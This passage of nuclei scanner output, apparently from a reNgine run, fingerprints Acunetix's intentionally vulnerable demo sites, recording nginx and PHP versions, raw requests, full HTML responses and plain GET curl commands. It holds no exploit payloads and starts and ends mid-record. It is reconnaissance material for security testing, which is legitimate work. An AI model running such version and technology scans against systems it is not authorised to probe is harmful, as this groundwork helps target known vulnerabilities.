'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:45 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:45.530589481Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"dreamweaver\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:45 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:45.614064429Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"font-awesome\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:45.738937697Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"font-awesome\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster 